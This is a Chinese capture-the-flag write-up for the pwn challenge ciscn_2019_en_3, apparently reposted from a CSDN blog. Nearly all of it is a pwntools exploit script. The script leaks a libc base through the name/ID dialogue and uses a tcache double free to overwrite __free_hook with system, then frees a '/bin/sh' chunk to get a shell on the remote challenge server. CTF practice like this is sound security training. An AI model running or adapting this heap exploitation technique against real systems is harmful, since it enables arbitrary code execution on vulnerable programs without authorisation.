ciscn_2019_en_3

新年好啊大家

解题

常规操作tcache打free_hook
exp:

#!/usr/bin/python2
from pwn import *
local = 0  # 1 = run the challenge binary locally; anything else = the remote instance

# Open the I/O tube first (as before), then load the ELF and its libc the same
# way for both targets.
# NOTE(review): elf.libc resolves the libc the binary would load on *this*
# machine, even when p is the remote tube; the symbol offsets used in exp()
# only hold if that matches the libc the server runs -- confirm.
if local == 1:
    p = process('./ciscn_2019_en_3')
else:
    p = remote('node3.buuoj.cn', 27268)
elf = ELF('./ciscn_2019_en_3')
libc = elf.libc

def add(size, story):
    """Menu option 1: create a story of ``size`` bytes with content ``story``.

    Both follow-up answers wait on a prompt ending in ``story:``; the first
    is the length, the second the content (matching the original call order).
    Uses the module-level tube ``p``.
    """
    p.sendlineafter('choice:', '1')
    answers = (('story:', str(size)), ('story:', story))
    for prompt, line in answers:
        p.sendlineafter(prompt, line)

def edit():
    """Menu option 2 (edit): only the menu choice is sent.

    Nothing in this file calls it, so the rest of that dialogue is not modelled.
    Uses the module-level tube ``p``.
    """
    menu_choice = '2'
    p.sendlineafter('choice:', menu_choice)

def show():
    """Menu option 3 (show): only the menu choice is sent.

    Nothing in this file calls it; the program's reply is not read here.
    Uses the module-level tube ``p``.
    """
    menu_choice = '3'
    p.sendlineafter('choice:', menu_choice)

def delete(idx):
    """Menu option 4: free the story at index ``idx``.

    The client side does no bookkeeping, so the same index can be sent twice;
    exp() depends on the server not rejecting that either.
    Uses the module-level tube ``p``.
    """
    answers = (('choice:', '4'), ('index:', str(idx)))
    for prompt, line in answers:
        p.sendlineafter(prompt, line)

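def lg(address, data):
    """Log ``data`` as a hex number under the label ``address`` (pwntools success line).

    A ``def`` instead of an assigned lambda (PEP 8 E731) so the function has a
    real name in tracebacks. The parameter names are kept for existing callers:
    ``address`` is really the label and ``data`` the value.
    """
    # Same output as the original '%s: ' % address + hex(data).
    log.success('%s: %s' % (address, hex(data)))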

def exp():
    """Drive the two bugs this write-up uses: a libc-pointer leak in the name/ID
    dialogue and a double free on a story chunk (tcache, per the heading above).

    Reads the module-level tube ``p`` and ``libc``; no return value.
    """
    p.sendlineafter('name?','aaaaaa')
    # An 8-byte ID; the data that follows in the reply carries a libc pointer.
    # NOTE(review): why the binary leaks it is not shown on this page --
    # presumably the echo runs past the unterminated ID; confirm in the binary.
    p.sendlineafter('ID.','2'*8)
    # Keep the last 6 bytes up to the 0x7f high byte, zero-pad to 8 and rebase.
    # The -231 is a challenge-specific distance from setbuffer, so the result is
    # only right for the libc the server actually runs.
    libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-231-libc.sym['setbuffer']
    lg('libcbase',libcbase)
    free_hook=libcbase+libc.sym['__free_hook']
    system=libcbase+libc.sym['system']
    add(0x20,'aaaa')#0
    add(0x20,'/bin/sh\x00')  # index 1, later passed to free()
    # Double free: the same chunk is queued in its tcache bin twice.
    # glibc >= 2.29 tcache double-free detection (the per-chunk key field)
    # would abort on the second delete; the target presumably runs an older libc.
    delete(0)
    delete(0)
    # Reallocating the duplicate and writing into it overwrites the tcache
    # next pointer of the copy still queued behind it...
    add(0x20,p64(free_hook))
    add(0x20,'dd')
    # ...so the following allocation of that size returns __free_hook itself.
    add(0x20,p64(system))
    # free(chunk 1) now goes through __free_hook == system with "/bin/sh".
    delete(1)
    p.interactive()

if __name__ == "__main__":
    # Entry point; the tube and ELF are opened at import time above.
    exp()


转载自blog.csdn.net/qq_37433000/article/details/104084541